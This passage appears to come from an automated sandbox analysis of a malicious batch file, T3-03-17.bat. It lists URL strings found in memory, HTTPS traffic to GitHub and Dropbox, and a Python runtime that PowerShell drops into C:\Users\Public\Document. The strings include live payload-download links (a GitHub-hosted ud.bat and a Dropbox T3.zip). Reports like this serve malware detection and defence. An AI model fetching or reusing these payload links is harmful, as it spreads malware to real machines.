          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE49A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-parameter-entities
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE499E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE49A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE49A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE499E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE49A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/string-interning
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE499E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE49A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/validation
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE499E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE49A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/declaration-handler
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE499E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE49A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/dom-node
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE49A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/lexical-handler
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE499E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE49A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/xml-string
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4695000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.python.org/entities/fragment-builder/internal
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4A85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xmlrpc-epi.sourceforge.net/specs/rfc.fault_codes.php)
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xmlrpc.usefulinc.com/doc/reserved.html
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xmlrpc.usefulinc.com/doc/sysmethodsig.html
          Source: python.exe, 00000013.00000003.2400086075.0000019F8E43B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zgp.org/pipermail/p2p-hackers/2001-September/000316.html
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE3C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE48AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue17741
          Source: python.exe, 00000013.00000003.2423013158.0000019F8F47B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue25942
          Source: webdriver.py2.2.drString found in binary or memory: https://bugs.python.org/issue38210
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
          Source: powershell.exe, 00000002.00000002.2559482089.0000023CF3D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.2559482089.0000023CF3D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.2559482089.0000023CF3D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
          Source: METADATA.2.drString found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
          Source: python.exe, 00000013.00000003.2374510667.0000019F8E32D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2374592753.0000019F8DAF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/reference/import.html#__path__
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
          Source: python.exe, 00000013.00000003.2439807022.0000019F9083F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2424313771.0000019F9083F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2427164804.0000019F9083F000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2437802501.0000019F9083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eli.thegreenplace.net/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
          Source: METADATA.2.drString found in binary or memory: https://filepreviews.io/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE62BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE62B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE62D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fishshell.com/);
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE3EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: webdriver.py2.2.drString found in binary or memory: https://github.com/SeleniumHQ/selenium/issues/4555
          Source: readme.txt.2.drString found in binary or memory: https://github.com/mhammond/pywin32/issues
          Source: readme.txt.2.drString found in binary or memory: https://github.com/mhammond/pywin32/tree/master/adodbapi.
          Source: sessions.py.2.drString found in binary or memory: https://github.com/psf/requests/issues/1084
          Source: sessions.py.2.drString found in binary or memory: https://github.com/psf/requests/issues/3490
          Source: python.exe, 00000013.00000003.2374510667.0000019F8E32D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs)
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1328)
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1329)
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1330)
          Source: METADATA.2.drString found in binary or memory: https://github.com/python-attrs/attrs/wiki/Extensions-to-attrs)
          Source: METADATA.2.drString found in binary or memory: https://github.com/sponsors/hynek
          Source: METADATA.2.drString found in binary or memory: https://github.com/sponsors/hynek).
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE5F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2563196888.0000023CFC0F1000.00000004.00000020.00020000.00000000.sdmp, T3-03-17.batString found in binary or memory: https://github.com/ty9989/u/raw/main/ud.bat
          Source: poolmanager.cpython-310.pyc.1784820139328.19.drString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
          Source: poolmanager.cpython-310.pyc.1784820139328.19.drString found in binary or memory: https://google.com/
          Source: poolmanager.cpython-310.pyc.1784820139328.19.drString found in binary or memory: https://google.com/mail
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
          Source: poolmanager.cpython-310.pyc.1784820139328.19.drString found in binary or memory: https://httpbin.org/
          Source: sessions.py.2.drString found in binary or memory: https://httpbin.org/get
          Source: METADATA.2.drString found in binary or memory: https://hynek.me/articles/import-attrs/)
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
          Source: __init__.cpython-310.pyc.1784821616560.19.drString found in binary or memory: https://json.org
          Source: METADATA.2.drString found in binary or memory: https://klaviyo.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
          Source: powershell.exe, 00000002.00000002.2559482089.0000023CF3D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE461B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://opensource.org/licenses/apache2.0.php
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE461B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://opensource.org/licenses/mit-license.php
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
          Source: METADATA.2.drString found in binary or memory: https://peps.python.org/pep-0649/)
          Source: METADATA.2.drString found in binary or memory: https://peps.python.org/pep-0749/)-implementing
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
          Source: METADATA.2.drString found in binary or memory: https://pypi.org/project/attrs/)
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://python.org/sf/1333982
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE405F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
          Source: METADATA.2.drString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE405F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ty9989/u/main/ud.bat
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE44D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE44D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesrp
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
          Source: METADATA.2.drString found in binary or memory: https://stackoverflow.com/questions/tagged/python-attrs)
          Source: METADATA.2.drString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek
          Source: METADATA.2.drString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).
          Source: METADATA.2.drString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
          Source: sessions.py.2.drString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-6.4.4
          Source: poolmanager.cpython-310.pyc.1784820139328.19.drString found in binary or memory: https://twitter.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc0b08c3d2db78a7e95098c56339.dl.dropboxusercontent.com
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE40C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc0b08c3d2db78a7e95098c56339.dl.dropboxusercontent.com/cd/0/get/CmClwU6KOY_G7DxBCyyyczV6fxL6
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/)
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/FilePreviews.svg
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Klaviyo.svg
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Tidelift.svg
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Variomedia.svg
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/latest/names.html)
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
          Source: METADATA.2.drString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes)
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE5F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2563196888.0000023CFC0F1000.00000004.00000020.00020000.00000000.sdmp, T3-03-17.batString found in binary or memory: https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clm
          Source: powershell.exe, 00000002.00000002.2526191354.0000023CE1DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/t3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clm
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4449000.00000004.00000800.00020000.00000000.sdmp, pkgconfig.py.2.drString found in binary or memory: https://www.freedesktop.org/wiki/Software/pkg-config/
          Source: python.exe, 00000013.00000003.2427164804.0000019F90881000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2428965531.0000019F90887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gnu.org/software/bison/manual/html_node/Default-Reductions.html#Default-Reductions
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4C45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4C23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ibm.com/
          Source: libcrypto-1_1.dll.2.drString found in binary or memory: https://www.openssl.org/H
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE40C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE6109000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE4AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-%04d/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE5ABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE6362000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE6357000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE5ACA000.00000004.00000800.00020000.00000000.sdmp, python.exe, 00000013.00000003.2423533019.0000019F8E953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
          Source: build_ext.py.2.drString found in binary or memory: https://www.python.org/dev/peps/pep-0489/#export-hook-name
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE51A0000.00000004.00000800.00020000.00000000.sdmp, python.exe, 00000013.00000003.2396813314.0000019F8E481000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2398412884.0000019F8E481000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2401317346.0000019F8E481000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2395495378.0000019F8E481000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2399857923.0000019F8E481000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2392175483.0000019F8E811000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2403852689.0000019F8E440000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2392517866.0000019F8E2CA000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000013.00000003.2393436260.0000019F8E808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE487A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE48F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE48AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE4898000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE48E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE486E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license
          Source: python.exe, 00000013.00000003.2368314133.0000019F8E21C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/
          Source: powershell.exe, 00000002.00000002.2527605987.0000023CE577D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE5771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/)
          Source: webdriver.py2.2.drString found in binary or memory: https://www.selenium.dev/documentation/legacy/desired_capabilities/
          Source: webdriver.py2.2.drString found in binary or memory: https://www.selenium.dev/documentation/legacy/json_wire_protocol/.
          Source: METADATA.2.drString found in binary or memory: https://www.variomedia.de/
          Source: poolmanager.cpython-310.pyc.1784820139328.19.drString found in binary or memory: https://yahoo.com/
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54803
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.5:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.5:49724 version: TLS 1.2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\python_tools.catJump to dropped file

          System Summary

          barindex
          Powershell drops PE file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_overlapped.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\tcl86t.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_lzma.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win_amd64.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_ssl.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_bz2.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_msi.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\selenium\webdriver\common\windows\selenium-manager.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_sqlite3.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testcapi.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\tk86t.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\python.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testinternalcapi.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\libcrypto-1_1.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_queue.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_decimal.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\vcruntime140_1.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testbuffer.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testimportmultiple.pydJump to dropped file
